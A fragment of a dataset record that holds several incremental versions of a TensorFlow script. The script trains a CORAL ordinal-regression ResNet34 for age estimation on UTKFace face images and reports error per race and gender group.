np.unique(label)\n m = np.zeros(label.shape)\n for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, num_examples - label[label > t\n ].size])\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n return imp\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = imp[0:FLAGS.num_classes - 1]\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\n<mask token>\n",
"step-3": "<mask token>\nflags.DEFINE_string('img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')\nflags.DEFINE_string('txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt'\n , 'Text (with label information) directory')\nflags.DEFINE_string('val_img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/',\n 'Validate image path')\nflags.DEFINE_string('val_txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt'\n , 'Validate text path')\nflags.DEFINE_string('val_txt_path_2',\n 'D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt'\n , 'Validataion text path')\nflags.DEFINE_integer('img_size', 128, 'Image size')\nflags.DEFINE_integer('ch', 3, 'Image channels')\nflags.DEFINE_integer('batch_size', 256, 'Train Batch size')\nflags.DEFINE_integer('val_batch_size', 128, 'Validation Batch size')\nflags.DEFINE_integer('val_batch_size_2', 128, 'Validation2 batch size')\nflags.DEFINE_integer('num_classes', 48, 'Number of classes')\nflags.DEFINE_integer('epochs', 5000, 'Total epochs of training')\nflags.DEFINE_float('lr', 5e-05, 'Learning rate')\nflags.DEFINE_string('weights',\n '/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5'\n , '')\nflags.DEFINE_bool('train', True, 'True or False')\nflags.DEFINE_bool('pre_checkpoint', False, 'True or False')\nflags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')\nflags.DEFINE_string('save_checkpoint', '', 'Save checkpoint path')\nflags.DEFINE_string('graphs', '', '')\nflags.DEFINE_integer('n_test', 10000, 'Number of test images')\nflags.DEFINE_string('test_txt', '', 'Test text(label) path')\nflags.DEFINE_string('test_img', '', 'Test images path')\nflags.DEFINE_string('output_loss_txt',\n '/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt', ''\n )\n<mask token>\nFLAGS(sys.argv)\n<mask token>\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = label.size\n y = np.unique(label)\n m = np.zeros(label.shape)\n for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, num_examples - label[label > t\n ].size])\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n return imp\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = imp[0:FLAGS.num_classes - 1]\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\nif __name__ == '__main__':\n app.run(main)\n",
"step-4": "<mask token>\nflags.DEFINE_string('img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')\nflags.DEFINE_string('txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt'\n , 'Text (with label information) directory')\nflags.DEFINE_string('val_img_path',\n '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/',\n 'Validate image path')\nflags.DEFINE_string('val_txt_path',\n '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt'\n , 'Validate text path')\nflags.DEFINE_string('val_txt_path_2',\n 'D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt'\n , 'Validataion text path')\nflags.DEFINE_integer('img_size', 128, 'Image size')\nflags.DEFINE_integer('ch', 3, 'Image channels')\nflags.DEFINE_integer('batch_size', 256, 'Train Batch size')\nflags.DEFINE_integer('val_batch_size', 128, 'Validation Batch size')\nflags.DEFINE_integer('val_batch_size_2', 128, 'Validation2 batch size')\nflags.DEFINE_integer('num_classes', 48, 'Number of classes')\nflags.DEFINE_integer('epochs', 5000, 'Total epochs of training')\nflags.DEFINE_float('lr', 5e-05, 'Learning rate')\nflags.DEFINE_string('weights',\n '/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5'\n , '')\nflags.DEFINE_bool('train', True, 'True or False')\nflags.DEFINE_bool('pre_checkpoint', False, 'True or False')\nflags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')\nflags.DEFINE_string('save_checkpoint', '', 'Save checkpoint path')\nflags.DEFINE_string('graphs', '', '')\nflags.DEFINE_integer('n_test', 10000, 'Number of test images')\nflags.DEFINE_string('test_txt', '', 'Test text(label) path')\nflags.DEFINE_string('test_img', '', 'Test images path')\nflags.DEFINE_string('output_loss_txt',\n '/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt', ''\n )\nFLAGS = flags.FLAGS\nFLAGS(sys.argv)\noptimizer = tf.keras.optimizers.Adam(FLAGS.lr, beta_1=0.9, beta_2=0.99)\n\n\ndef _func(filename, label):\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot, label\n\n\ndef val_func(name, label):\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS\n .img_size - 8]) / 255.0\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n return decode_image, one_hot\n\n\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\n\[email protected]\ndef train_step(model, images, levels, imp):\n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n total_loss = -tf.reduce_sum((tf.math.log_sigmoid(logits) * levels +\n (tf.math.log_sigmoid(logits) - logits) * (1 - levels)) * imp, 1)\n total_loss = tf.reduce_mean(total_loss)\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = label.size\n y = np.unique(label)\n m = np.zeros(label.shape)\n for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, num_examples - label[label > t\n ].size])\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n return imp\n\n\[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * labels[i].numpy() + [0] * (FLAGS.num_classes - 1 - labels\n [i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n return tf.convert_to_tensor(levels, tf.float32)\n\n\ndef main(argv=None):\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size -\n 8, FLAGS.ch), include_top=False, batch_size=FLAGS.batch_size,\n weight_path=FLAGS.weights, weights='imagenet')\n regularizer = tf.keras.regularizers.l2(5e-06)\n initializer = tf.keras.initializers.glorot_normal()\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n logits = tf.keras.layers.Dense(FLAGS.num_classes - 1, use_bias=False)(\n avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits,\n probs])\n train_model.summary()\n if FLAGS.pre_checkpoint is True:\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer\n )\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.\n pre_checkpoint_path, max_to_keep=5)\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print('Latest checkpoint restored!!')\n if FLAGS.train == True:\n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.img_path + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0,\n usecols=1)\n imp = task_importance_weights(data_label - 16)\n imp = imp[0:FLAGS.num_classes - 1]\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\nif __name__ == '__main__':\n app.run(main)\n",
"step-5": "# -*- coding: utf-8 -*-\n# https://github.com/Raschka-research-group/coral-cnn/tree/master/model-code/resnet34\nfrom absl import flags, app\nfrom Rank_consistent_model_fix import *\nfrom Rank_consistent_model import *\nfrom random import shuffle, random\n\nimport tensorflow as tf\nimport numpy as np\n# import cv2\nimport os\nimport sys\nimport datetime\n\nflags.DEFINE_string('img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')\n\nflags.DEFINE_string('txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt', 'Text (with label information) directory')\n\nflags.DEFINE_string('val_img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Validate image path')\n\nflags.DEFINE_string('val_txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt', 'Validate text path')\n\nflags.DEFINE_string(\"val_txt_path_2\", \"D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt\", \"Validataion text path\")\n\nflags.DEFINE_integer('img_size', 128, 'Image size')\n\nflags.DEFINE_integer('ch', 3, 'Image channels')\n\nflags.DEFINE_integer('batch_size', 256, 'Train Batch size')\n\nflags.DEFINE_integer(\"val_batch_size\", 128, \"Validation Batch size\")\n\nflags.DEFINE_integer(\"val_batch_size_2\", 128, \"Validation2 batch size\")\n\nflags.DEFINE_integer('num_classes', 48, 'Number of classes')\n\nflags.DEFINE_integer('epochs', 5000, 'Total epochs of training')\n\nflags.DEFINE_float(\"lr\", 5e-5, \"Learning rate\")\n\nflags.DEFINE_string('weights', \"/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5\", '')\n\nflags.DEFINE_bool('train', True, 'True or False')\n\nflags.DEFINE_bool('pre_checkpoint', False, 'True or False')\n\nflags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')\n\nflags.DEFINE_string('save_checkpoint', '', 'Save 